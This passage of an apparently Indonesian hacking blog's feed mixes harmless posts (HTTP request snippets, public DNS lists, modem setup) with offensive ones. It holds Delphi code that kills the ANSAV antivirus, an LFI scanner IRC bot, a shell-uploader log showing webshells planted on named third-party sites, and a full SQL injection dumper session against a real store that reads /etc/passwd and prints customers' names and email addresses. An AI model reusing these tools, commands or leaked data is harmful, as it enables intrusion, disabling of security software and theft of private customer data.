CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);<br /> FPE32.dwSize := SizeOf(FPE32);<br /> Loop := Process32First(FSHnd, FPE32);<br /> while Integer(Loop) <> 0 do<br /> begin<br /> if ((UpperCase(ExtractFileName(FPE32.szExeFile)) = UpperCase(FileName)) or<br /> (UpperCase(FPE32.szExeFile) = UpperCase(FileName))) then<br /> Result := Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE,BOOL(0),<br /> FPE32.th32ProcessID),ExitCode));<br /> Loop := Process32Next(FSHnd, FPE32);<br /> end;<br /> CloseHandle(FSHnd);<br />end;<br /><br /><b>procedure TForm1.Button1Click(Sender: TObject);</b><br />begin<br /> if StopService('','ANSAVDaemon') then<br /> if KillProcByFileName('ansavd.exe',1) <> 0 then<br /> ShowMessage('ANSAV Guard Killed!');<br />end;<br /><br />{ .....End }<br /><br />Atau bisa juga dengan hanya menggunakan fungsi KillProcByFileName(NameFile,ExitCode)<br />Dengan catatan ExitCode <> 0<br /><br />{ .....End }<br /><br /><b>procedure TForm1.Button1Click(Sender: TObject);</b><br />begin<br /> if KillProcByFileName('ansavd.exe',2010) <> 0 then<br /> ShowMessage('ANSAV Guard Killed!');<br />end;<br /><br />{ .....End }<br /><br />Trik di atas berlaku juga untuk salah satu AntiVirus Turunan dari ANSAV 2,<br />yaitu: AVI 2 (AntiVirus Info Komputer)<br /><br /><b>Happy Coding ^^</b><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-1519781965179068950?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-53854182342527033772010-11-15T04:39:00.000+07:002010-11-15T04:39:00.722+07:00Menghapus Folder autorun.inf buatan SmadAV dengan DelphiBerikut merupakan salah satu cara menghapus folder <b>autorun.inf</b> buatan SamadAV menggunakan <b>Delphi</b>.<br /><br /><blockquote>Uses ShellApi; <br /><br />function HapusFolder(NamaFolder:String):Boolean;<br />var<br /> T: TSHFileOpStruct;<br />begin<br /> Result := False;<br /> FillChar(T, SizeOf(T), #0);<br /> with T do<br /> begin<br /> Wnd := 0;<br /> wFunc := FO_DELETE;<br /> pFrom := PChar('\\?\' + NamaFolder + #0);<br /> fFlags := FOF_ALLOWUNDO or FOF_SILENT or FOF_NOCONFIRMATION;<br /> end;<br /> if (SHFileOperation(T) = 0) then<br /> Result := True;<br />end;<br /><br />procedure TForm1.Button1Click(Sender: TObject);<br />var S: String;<br />begin<br /> MessageBeep(mb_iconExclamation);<br /> S := 'Z:\autorun.inf'; { path dari folder autorun.inf }<br /> if DirectoryExists(S) then<br /> begin<br /> if SetFileAttributes(PChar(S),FILE_ATTRIBUTE_NORMAL) then<br /> begin<br /> if HapusFolder(S) then<br /> MessageDlg('SUKSES menghapus folder '+S,mtInformation,[mbOK],0)<br /> else<br /> MessageDlg('GAGAL menghapus folder '+S,mtInformation,[mbOK],0);<br /> end;<br /> end<br /> else<br /> MessageDlg('Folder '+S+' tidak ditemukan!',mtError,[mbOK],0);<br />end;</blockquote><br /><b>Happy Coding ^^</b><br /><br /><i>Note:</i><br /><i>Only for Educational Purpose!</i><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-5385418234252703377?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-74923963056737732862010-09-21T18:46:00.002+07:002010-09-21T18:51:23.818+07:00GET & POST with PERL<b>Introduction</b><br /><br />LWP (short for "Library for WWW in Perl") is a popular group of Perl modules for accessing data on the Web. Like most Perl module-distributions, each of LWP's component modules comes with documentation that is a complete reference to its interface. However, there are so many modules in LWP that it's hard to know where to look for information on doing even the simplest things.<br /><br /><b>Document: </b><a href="http://www.perl.com/pub/2002/08/20/perlandlwp.html"><i>http://www.perl.com/pub/2002/08/20/perlandlwp.html</i></a><br /><br /><br /><div style="color: rgb(56, 118, 29);"><div style="color: rgb(56, 118, 29);">#!/usr/bin/perl -w</div><div style="color: rgb(56, 118, 29);"><br /></div><div style="color: rgb(56, 118, 29);"># For supporting HTTPS Protocol:</div><div style="color: rgb(56, 118, 29);"># [root@centos ~]# yum install perl-Net-SSLeay perl-Crypt-SSLeay<br /># [root@ubuntu ~]# apt-get install libcrypt-ssleay-perl libnet-ssleay-perl </div><div style="color: rgb(56, 118, 29);"><br /></div><div style="color: rgb(56, 118, 29);">use HTTP::Request;<br />use HTTP::Cookies;<br />use LWP::UserAgent;<br /><br />$get_content = get('http://facebook.com/');</div><div style="color: rgb(56, 118, 29);"><br />$post_content = post('http://m.facebook.com/login.php',</div><div style="color: rgb(56, 118, 29);">"email=user@mail.com&pass=password&login=Login");<br /><br />sub get {<br /> my $url = $_[0];<br /> my $cookie = HTTP::Cookies->new(file => "cookies.log", autosave=>1,);<br /> my $ua = LWP::UserAgent->new(agent => "Mozilla/5.0");<br /> $ua->cookie_jar($cookie);<br /> $ua->timeout(15);<br /> my $req = HTTP::Request->new(GET => $url);<br /> my $res = $ua->request($req);<br /> if ($res->is_error) { print $res->status_line."\n"; }<br /> return $res->content;<br />}<br /><br />sub post {<br /> my $url = $_[0];<br /> my $data = $_[1];<br /> my $cookie = HTTP::Cookies->new(file => "cookies.log", autosave=>1,);<br /> my $ua = LWP::UserAgent->new(agent => "Mozilla/5.0");<br /> $ua->cookie_jar($cookie);<br /> $ua->timeout(15);<br /> push @{$ua->requests_redirectable}, 'POST';<br /> my $req = HTTP::Request->new(POST => $url);<br /> $req->content_type('application/x-www-form-urlencoded');<br /> $req->content("$data");<br /> my $res = $ua->request($req);<br /> if ($res->is_error) { print $res->status_line."\n"; }<br /> return $res->content;<br />}</div><span style="color: rgb(0, 153, 0);"></span></div><br /><b>Happy coding :)</b><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-7492396305673773286?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-29682665965016496102010-09-21T18:45:00.002+07:002010-09-21T18:52:24.248+07:00GET & POST with PHP cURL<b>Introduction</b><br /><br /><div class="para">PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication.</div><div class="para"><br /><b>Document:</b><i> <a href="http://www.php.net/manual/en/intro.curl.php">http://www.php.net/manual/en/intro.curl.php</a></i></div><br /><b>cURL GET Content:</b><br /><br /><span style="background-color: rgb(106, 168, 79);"><span style="background-color: white; color: rgb(56, 118, 29);">$content = curl_get_content('http://facebook.com/');</span></span><br /><span style="background-color: white; color: rgb(56, 118, 29);">print $content;</span><br /><br /><span style="background-color: white; color: rgb(56, 118, 29);">function curl_get_content($url) {</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> $ch = curl_init();</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> $path = dirname(__FILE__).'/';</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_URL, $url);</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_HEADER, 0);</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_COOKIEJAR, $path."cookie.log");</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_COOKIEFILE, $path."cookie.log");</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0");</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> $html = curl_exec($ch);</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> curl_close($ch);</span><br /><span style="background-color: white; color: rgb(56, 118, 29);"> return $html;</span><br /><span style="background-color: white; color: rgb(56, 118, 29);">}</span><br /><br /><b>cURL POST Data:</b><br /><br /><span style="color: rgb(56, 118, 29);">$content = curl_post_content('http://m.facebook.com/login.php',</span><br /><span style="color: rgb(56, 118, 29);">"email=user@mail.com&pass=password&login=Login");</span><br /><span style="color: rgb(56, 118, 29);">print $content;</span><br /><br /><span style="color: rgb(56, 118, 29);">function curl_post_content($url,$data) {</span><br /><span style="color: rgb(56, 118, 29);"> $ch = curl_init();</span><br /><span style="color: rgb(56, 118, 29);"> $path = dirname(__FILE__).'/';</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_URL, $url);</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_POST, 1);</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_HEADER, 0);</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_COOKIEJAR, $path."cookie.log");</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_COOKIEFILE, $path."cookie.log");</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</span><br /><span style="color: rgb(56, 118, 29);"> curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0");</span><br /><span style="color: rgb(56, 118, 29);"> $html = curl_exec($ch);</span><br /><span style="color: rgb(56, 118, 29);"> curl_close($ch);</span><br /><span style="color: rgb(56, 118, 29);"> return $html;</span><br /><span style="color: rgb(56, 118, 29);">}</span><br /><br /><b>Want more?</b><br /><b>Document:</b> <a href="http://php.net/manual/en/book.curl.php"><i>http://php.net/manual/en/book.curl.php</i></a><br /><br /><b>Have nice coding :)</b><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-2968266596501649610?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-3720086150842081612010-09-21T18:43:00.002+07:002010-09-21T18:46:38.983+07:00Public DNS Server<b>Apa itu DNS Server?</b><br />DNS (Domain Name System) Server adalah salah satu jenis sistem yang melayani permintaan pemetaan IP Address ke FQDN (Fully Qualified Domain Name) dan dari FQDN ke IP Address. <b> </b><br /><br /><b>What Is a DNS Server?</b><br /><div>The Domain Name System (DNS) is a standard technology for managing the names of Web sites and other Internet domains. DNS technology allows you to type names into your Web browser like <i>google.com</i> and your computer to automatically find that address on the Internet. A key element of the DNS is a worldwide collection of <i>DNS servers</i>. What, then, is a DNS server?</div><br /><b>Answer: </b>A <b>DNS server</b> is any computer registered to join the Domain Name System. A DNS server runs special-purpose networking software, features a public IP address, and contains a database of network names and addresses for other Internet hosts.<b> </b><br /><br /><b>Berikut adalah daftar Public DNS Server yang umum digunakan.</b><br /><br /><b>Google</b><br /><br /> * 8.8.8.8<br /> * 8.8.4.4<br /><br /><b>ScrubIt</b><br /><br /> * 67.138.54.100<br /> * 207.225.209.66<br /><br /><b>dnsadvantage</b><br /><br /> * 156.154.70.1<br /> * 156.154.71.1<br /><br /><b>OpenDNS</b><br /><br /> * 208.67.222.222<br /> * 208.67.220.220<br /><br /><b>vnsc-pri.sys.gtei.net</b><br /><br /> * 4.2.2.1<br /> * 4.2.2.2<br /> * 4.2.2.3<br /> * 4.2.2.4<br /> * 4.2.2.5<br /> * 4.2.2.6<br /><br /><b>Nawala Project</b><br /><br /> * 180.131.144.144<br /> * 180.131.145.145<br /><br /><b>telkom.net.id</b><br /><br /> * 202.155.0.20<br /> * 202.155.0.15<br /> * 202.134.0.62<br /> * 202.134.0.155<br /> * 202.134.1.10<br /> * 202.134.2.5<br /> * 203.130.196.5<br /><br /><b>cbn.net.id</b><br /><br /> * 202.158.40.1<br /> * 202.158.20.1<br /><br /><b>indo.net.id</b><br /><br /> * 202.159.32.2<br /> * 202.159.33.2<br /><br /><b>indosat.net.id</b><br /><br /> * 202.155.0.20<br /> * 202.155.0.15<br /> * 202.155.30.227<br /><br /><b>itb.ac.id</b><br /><br /> * 202.249.24.65<br /> * 167.205.23.1<br /> * 167.205.22.123<br /> * 167.205.30.114<br /><br /><b>ukdw.ac.id</b><br /><br /> * 222.124.22.18<br /><br /><b>sat.net.id</b><br /><br /> * 202.149.82.25<br /> * 202.149.82.29<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-372008615084208161?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-85006231361723412102010-04-10T06:34:00.012+07:002010-06-23T20:00:04.652+07:00VopCrew IJO Scanner v1.2 (LFI Scanner) #updated<div style="text-align: center;"><span style="font-weight: bold;">VopCrew IJO Scanner</span><br />LFI Scanner (/proc/self/environ) IRC Bot<br /></div><br /><div style="text-align: left;"><span style="font-weight: bold;">How to run:</span><br /><br />$ perl ijoscan.pl irc.server.net 6667 botnick botident channel yournick fakeproc<br /><br /><span style="font-weight: bold;">How to scan via IRC:</span><br /><br />!ijoscan [<lfibug><dork>lfibug] [dork]</dork></lfibug><br /><div style="text-align: left;"><lfibug><dork>!ijoscan index.php?option=com_bca-rss-syndicator&controller= com_bca-rss-syndicator</dork></lfibug><br /></div><lfibug><dork></dork></lfibug><br /><lfibug><dork><span style="font-weight: bold;">Example Result:</span></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_3_FUVcKXdcE/S7-8O0ObPAI/AAAAAAAAACM/tGmZLcjdO6c/s1600/result2.png"><img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 478px; height: 206px;" src="http://4.bp.blogspot.com/_3_FUVcKXdcE/S7-8O0ObPAI/AAAAAAAAACM/tGmZLcjdO6c/s400/result2.png" alt="" id="BLOGGER_PHOTO_ID_5458288236119669762" border="0" /></a><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug><br /><lfibug><dork></dork></lfibug></div><div style="text-align: center;"><div style="text-align: left;"><lfibug><dork>[<span style="font-weight: bold;">download</span>] <span>http://c0li.info/xpl/ijoscan-v1.2.zip</span></dork></lfibug><br /></div><lfibug><dork></dork></lfibug></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-8500623136172341210?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com12tag:blogger.com,1999:blog-5676546943449335880.post-5782403649084893172010-03-27T05:15:00.003+07:002010-06-23T20:07:34.831+07:00Simple Shell Uploader via LFI Bugz (/proc/self/environ)<input id="post_form_id" name="post_form_id" value="0e04e51bdceed5fa3857f4609aac73f0" autocomplete="off" type="hidden">[source] <a href="http://okedeh.co.tv/n0va.txt" target="_blank" rel="nofollow" onmousedown="'UntrustedLink.bootstrap($(this),"><span>http://okedeh.co.tv/n0va.t</span><wbr>xt</a><br /><div style="text-align: left;" class="note_content text_align_ltr direction_ltr clearfix"><br />perl n0va.txt <host> <path> <bug><br /><br /><span> $ perl n0va.txt www.man18-xxx.sch.id / "index.php?option=com_ckfo</span><wbr>rms&controller="<br />[~] Exploiting ...<br />[+] Success -> <a href="http://www.man18-xxx.sch.id/n0va.php" target="_blank" rel="nofollow" onmousedown="'UntrustedLink.bootstrap($(this),"><span>http://www.man18-xxx.sch.i</span><wbr>d/n0va.php</a><br /><br /><span> $ perl n0va.txt pcprintersolutixxx.com /pcprintersolutixxx/ "index.php?option=com_ckfo</span><wbr>rms&controller="<br />[~] Exploiting ...<br />[+] Success -> <a href="http://pcprintersolutixxx.com/pcprintersolutixxx/n0va.php" target="_blank" rel="nofollow" onmousedown="'UntrustedLink.bootstrap($(this),"><span>http://pcprintersolutixxx.</span><wbr><span>com/pcprintersolutixxx/n0v</span><wbr>a.php</a><br /><br />./bobok</bug></path></host></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-578240364908489317?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com4tag:blogger.com,1999:blog-5676546943449335880.post-22603915038044562292010-03-21T23:54:00.004+07:002010-03-22T04:39:14.634+07:00Simple SQLi Dumper v5.1 [v5.0 Updated + Fixed ][SOURCE] http://okedeh.co.tv/ssdp51.tar.gz<br />================================<br /><br />Simple SQLi Dumper (SSDp) v5.1 for MySQL [README]<br />Author: Vrs-hCk<br />EMail: ander[at]antisecurity.org<br />Website: http://www.antisecurity.org<br /><br />SSDp v5.1 DESCRIPTION<br />---------------------<br />SSDp is Open Source PHP MySQL Injection Tool.<br />Written in Perl Scripting Language.<br /><br />IMPORTANT<br />---------<br />ONLY FOR EDUCATIONAL PURPOSE.<br />THE AUTHOR IS NOT RESPONSABLE OF ANY IMPROPERLY USE OF THIS TOOL.<br />USE IT AT YOUR OWN RISK !!<br /><br />FEATURES<br />--------<br />[+] MySQL Injection<br />[+] MySQL v4 Tables and Columns Brute<br />[+] Magic Number / Null Column Finder<br />[+] Gathering MySQL Information<br />[+] Database Information Schema Extractor<br />[+] Columns Path Finder<br />[+] ...<br /><br />CHANGES<br />-------<br />5.1 -> Added @@version_compile_os function<br />Added get all found of magic numbers<br /> Fixed unhex(hex())) null result<br /> Fixed minor bugs<br />5.0 -> Go Public !!!<br /><br />GREETZ TO<br />---------<br />Jack-, NoGe, OoN_Boy, Paddy, s4va, xr00tb0y, S3T4N, Kucink Garonk a.k.a Mey<br />Wishnu, bL4Ck_3n91n3, R3V4N_B4ST4RD, em|nem, pizzyroot, loqsa, dkk (*_^)<br />[MH] MainHack BrotherHood, [SiD] ServerIsDown UnderGrounD, AntiSecurity.org Team<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-2260391503804456229?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-60198992410714156382010-03-15T15:28:00.003+07:002010-03-22T04:39:35.095+07:00Simple SQLi Dumper v5.0 for MySQL<div style="text-align: left;">[Source] http://okedeh.co.tv/ssdp51.tar.gz [updated]<br /><br />./begin<br /><br />[ander@vps]$ perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -f 50 -magic<br /><br />[o]=================================================[x]<br />| Simple SQLi Dumper v5.0 |<br />| Coded by Vrs-hCk |<br />[o]=================================================[o]<br /> Help Command: -h, -help, --help<br /><br />[+] URL: http://www.460productions.com/store.php?cat=2<br />[+] End Tag: --<br /><br />Attempting to find the magic number...<br /><br />[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,<br /><br />[+] Field Length : 24<br />[+] Magic Number : 1,3,4,7,8,10,11,12,13,14,15,16,17,18,19,21,23,24,<br />[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br /><br />Showing MySQL Information ...<br /><br />[+] Database: 460store<br />[+] User: i460usr@boscgi1002.eigbox.net<br />[+] Version: 5.0.51a-log<br />[+] Access to "mysql" Database: No<br />[+] Read File "/etc/passwd": Yes (w00t)<br />[+] Create File "/tmp/c0li-361.txt": Yes (w00t)<br /><br />Done.<br /><br />[ander@vps]$ perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -table<br /><br />[o]=================================================[x]<br />| Simple SQLi Dumper v5.0 |<br />| Coded by Vrs-hCk |<br />[o]=================================================[o]<br /> Help Command: -h, -help, --help<br /><br />[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br />[+] SQLi End Tag: --<br />[+] Database Name: 460store<br />[+] Number of Tables: 18<br /><br />Showing tables ...<br /><br />[1] aspect_ratio(2)<br />[2] audio_format(3)<br />[3] category(7)<br />[4] customer(199)<br />[5] deposit(11)<br />[6] discount_group(9)<br />[7] discount_group_price(10)<br />[8] order(235)<br />[9] order_item(259)<br />[10] order_source(5)<br />[11] order_status(4)<br />[12] order_type(2)<br />[13] payment_type(4)<br />[14] product(30)<br />[15] product_group(17)<br />[16] security(1)<br />[17] shopping_cart(0)<br />[18] user_session(138)<br /><br />Done.<br /><br />[ander@vps]$ perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -t customer -column<br /><br />[o]=================================================[x]<br />| Simple SQLi Dumper v5.0 |<br />| Coded by Vrs-hCk |<br />[o]=================================================[o]<br /> Help Command: -h, -help, --help<br /><br />[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br />[+] SQLi End Tag: --<br />[+] Database Name: 460store<br />[+] Table Name: customer<br />[+] Number of Columns: 17<br /><br />Showing columns from table "customer" ...<br /><br />[+] customer(199): customer_id,last_name,first_name,email_address,telephone,address_line1,address_line2,address_city,address_state,address_zip,address_country,address_name,paypal_payer_id,create_date,create_by,modify_date,modify_by<br /><br />Done.<br /><br />[ander@vps]$ perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -t customer -c first_name,email_address -where "email_address like 0x257961686F6F25" -dump<br /><br />[o]=================================================[x]<br />| Simple SQLi Dumper v5.0 |<br />| Coded by Vrs-hCk |<br />[o]=================================================[o]<br /> Help Command: -h, -help, --help<br /><br />[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br />[+] SQLi End Tag: --<br /><br />[+] Database Name: 460store<br />[+] Table Name: customer<br />[+] Column Name: first_name,email_address<br />[+] Data Count: 199<br /><br />Special Dump Query: WHERE email_address like 0x257961686F6F25<br /><br />Dumping 21 Data ...<br /><br />[1] Ranginee : rangineec@yahoo.com<br />[2] Evie : sunroseva@yahoo.com<br />[3] Daniel : danielriveraus@yahoo.com<br />[4] Anne : corbin.anne@yahoo.com<br />[5] Jane : janealogyusa@yahoo.com<br />[6] Emily : emsdancemom@yahoo.com<br />[7] Clare : tllandckl@yahoo.com<br />[8] Kristi : kdosherdvm@yahoo.com<br />[9] Sue Ellen : lanxiyayi@yahoo.com<br />[10] Dena : paeisa378@yahoo.com<br />[11] Jennifer : jenecks@yahoo.com<br />[12] Frederic : fredgmus@yahoo.com<br />[13] M.K. : mkehlj1@yahoo.com<br />[14] Wendy : dehcml1303@yahoo.com<br />[15] Melinda : themannons@yahoo.com<br />[16] Sara : inman710@yahoo.com<br />[17] Angela : adwoodie@yahoo.com<br />[18] Shri G.B. : rangineec@yahoo.com<br />[19] Theresa : theresalink@yahoo.com<br />[20] Eileen : egodwin57@yahoo.com<br />[21] Alycia : leashylovex3@yahoo.com<br /><br />Done.<br /><br />[ander@vps]$ perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c pass -find<br /><br />[o]=================================================[x]<br />| Simple SQLi Dumper v5.0 |<br />| Coded by Vrs-hCk |<br />[o]=================================================[o]<br /> Help Command: -h, -help, --help<br /><br />[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br />[+] SQLi End Tag: --<br />[+] Database Name: 460store<br /><br />Searching for Columns Name like *pass* ...<br /><br />[+] Columns Found:<br /><br />[1] 460store.security.password<br /><br />Done.<br /><br />./eof</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-6019899241071415638?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-900335695964609802009-11-06T14:29:00.003+07:002009-11-06T15:16:49.224+07:00IM2 - Huawei E160 - Ubuntu 9.04Sangat mudah untuk melakukan setting koneksi internet IM2 pada ubuntu 9.04, karena modem huawei E160 sudah terdeteksi otomatis oleh ubuntu 9.04.<br /><br />ander@ubuntu:~$ <span style="font-weight: bold;">cat /etc/issue</span><br />Ubuntu 9.04 \n \l<br /><br />ander@ubuntu:~$ <span style="font-weight: bold;">lsusb</span><br />Bus 007 Device 002: ID 15d9:0a33<br />Bus 007 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub<br />Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br /><span style="font-weight: bold;">Bus 002 Device 004: ID 12d1:1003 Huawei Technologies Co., Ltd. E220 HSDPA Modem / E270 HSDPA/HSUPA Modem</span><br />Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub<br />Bus 002 Device 002: ID 064e:a101 Suyin Corp.<br /><br />Walaupun terdeteksi sebagai Modem E220 HSDPA / E270 HSDPA/HSUPA, namun tetap bisa digunakan :)<br /><br />Berikut adalah langkah-langkah <span style="font-weight: bold;">setting IM2</span>:<br /><br />1. System - Preferences - Network Connections - Mobile Broadband - Add<br /><br />Setelah muncul pesan selamat datang pada New Mobile Broadband Connection, klik <span style="font-weight: bold;">Forward</span>, lalu pada Service Provider pilih <span style="font-weight: bold;">Country: Indonesia</span> dan pada <span style="font-weight: bold;">Provider</span> pilih <span style="font-weight: bold;">Indosat (Matrix)</span>. Kalau sudah klik <span style="font-weight: bold;">Forward</span> dan ganti <span style="font-weight: bold;">Name: </span>Indosat (Matrix) menjadi <span style="font-weight: bold;">indosatm2</span>. Setelah itu klik <span style="font-weight: bold;">Apply</span>.<br /><br />2. Masih pada window Network Connections<br /><br />Pilih koneksi <span style="font-weight: bold;">indosatm2</span>, lalu klik <span style="font-weight: bold;">Edit</span>.<br /><br />- Pada Tab <span style="font-weight: bold;">Mobile Broadband</span>, masukan username dan password IM2 anda, sedangkan untuk <span style="font-weight: bold;">APN:</span> satelindogprs.com indosatgprs <span style="font-weight: bold;">ganti</span> dengan <span style="font-weight: bold;">indosatm2</span>. Sehingga menjadi <span style="font-weight: bold;">APN: indosatm2</span>.<br /><br />- Silahkan masukan <span style="font-weight: bold;">PIN</span> apabila anda ingin koneksi terjadi tanpa konfirmasi permintaan <span style="font-weight: bold;">PIN</span> Kartu IM2.<br /><br />- Pada Tab <span style="font-weight: bold;">IPv4 Settings</span>, pilih <span style="font-weight: bold;">Method: Automatic (PPP) addresses only</span>, kemudian pada <span style="font-weight: bold;">DNS Servers: </span>202.155.46.66, 202.155.46.77 <span style="font-weight: bold;">ganti</span> dengan DNS Server dari IM2 yaitu <span style="font-weight: bold;">202.155.0.10, 202.155.0.15</span>. Bila sudah silahkan klik <span style="font-weight: bold;">Apply</span> lalu kilik <span style="font-weight: bold;">Close</span> untuk keluar dari window Network Connections.<br /><br />3. <span style="font-weight: bold;">Klik Kiri</span> pada icon Network Connection yang ada di sebelah kiri icon Sound dan Jam, lalu pilih menu <span style="font-weight: bold;">indosatm2</span>.<br /><br />Maka proses koneksi ke IM2 sedang dilakukan :)<br />Apabila anda ingin memutuskan koneksi lakukan cara yg sama sewaktu mau melakukan koneksi, tapi pilih lah menu <span style="font-weight: bold;">Disconnect</span>.<br /><br />Good Luck ^_^<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-90033569596460980?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com3tag:blogger.com,1999:blog-5676546943449335880.post-25669853450228352122009-11-05T17:20:00.006+07:002010-03-23T14:46:45.327+07:00MyEnTunnel<div style="text-align: center;"><span 